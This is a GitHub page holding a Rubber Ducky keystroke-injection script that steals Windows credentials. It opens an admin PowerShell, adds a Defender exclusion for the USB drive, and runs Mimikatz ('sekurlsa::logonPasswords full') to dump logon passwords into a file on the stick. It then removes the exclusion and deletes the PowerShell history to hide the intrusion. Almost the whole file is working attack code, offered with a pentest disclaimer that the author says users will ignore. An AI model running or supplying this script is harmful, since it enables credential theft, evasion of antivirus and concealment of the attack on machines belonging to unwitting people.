-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathFunni_Stick_V3.txt
More file actions
52 lines (48 loc) · 2.25 KB
/
Funni_Stick_V3.txt
File metadata and controls
52 lines (48 loc) · 2.25 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
REM -----Title: Funni Stick V3
REM -----Author: Maker (https://github.com/MakeshiftMaker)
REM -----Desc: A varient of Win_Pass_Grabber by makozort but not reliant on Internet potentially ignoring any server-side-issues with Downloading/Uploading Files and Logs
REM -----Your Rubber-Ducky will has to run on Twin-Duck Firmware for this to work (see README.txt)
REM -----Target: Logged in Win10 System with Admin access (maybe Win7 too)
REM -----ONLY USE THIS ON MACHINES YOU HAVE PERMISSION TO PENTEST, I'M NOT LIABLE FOR ANY MISCHIEF YOU MIGHT CAUSE. I KNOW YOU ARE GOING TO IGNORE THIS. THIS TEXT IS MORE FOR ME THAN IT IS FOR YOU
REM -----Set Default delay to 350 for a midrange computer, for faster computers/testing this can be decreased to 250
DEFAULT_DELAY 350
REM -----Delay of 1.5 seconds to let the "Keyboard" initialize
DELAY 1500
REM -----open Powershell as Admin
GUI r
STRING powershell
CTRL-SHIFT ENTER
DELAY 1000
LEFT
ENTER
DELAY 500
REM -----This long boy saves the Drive-Letter (E:, F:, G:) into a local variable called duckletter by id'ing it from its Size. This way we can find and execute things saved on there
REM -----There is propably a better way to do this but i havent figured it out yet
STRING $duckletter = Get-WmiObject -Query "select * from win32_diskdrive where Size=123379200" | %{gwmi -Query "ASSOCIATORS OF {Win32_DiskDrive.DeviceID=`"$($_.DeviceID.replace('\','\\'))`"} WHERE AssocClass = Win32_DiskDriveToDiskPartition"} | %{gwmi -Query "ASSOCIATORS OF {Win32_DiskPartition.DeviceID=`"$($_.DeviceID)`"} WHERE AssocClass = Win32_LogicalDiskToPartition"} | %{$_. deviceid}
ENTER
REM -----Lets Disable the antivirus (for now)
STRING Import-Module Defender
ENTER
STRING Set-MpPreference -ExclusionPath $duckletter
ENTER
REM -----Switch to the Ducky
STRING cd $duckletter
ENTER
REM -----Run Mimikatz and save the output onto a .txt file named after the UserName
STRING .\pw.exe > $env:UserName`.txt -and type $env:UserName`.txt
ENTER
STRING privilege::debug
ENTER
STRING sekurlsa::logonPasswords full
ENTER
STRING exit
ENTER
REM -----Cleanup Time!
REM -----Lets Enable the antivirus again
STRING Remove-MpPreference -ExclusionPath $duckletter
ENTER
REM -----remove Powerhsell history
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
ENTER
STRING exit
ENTER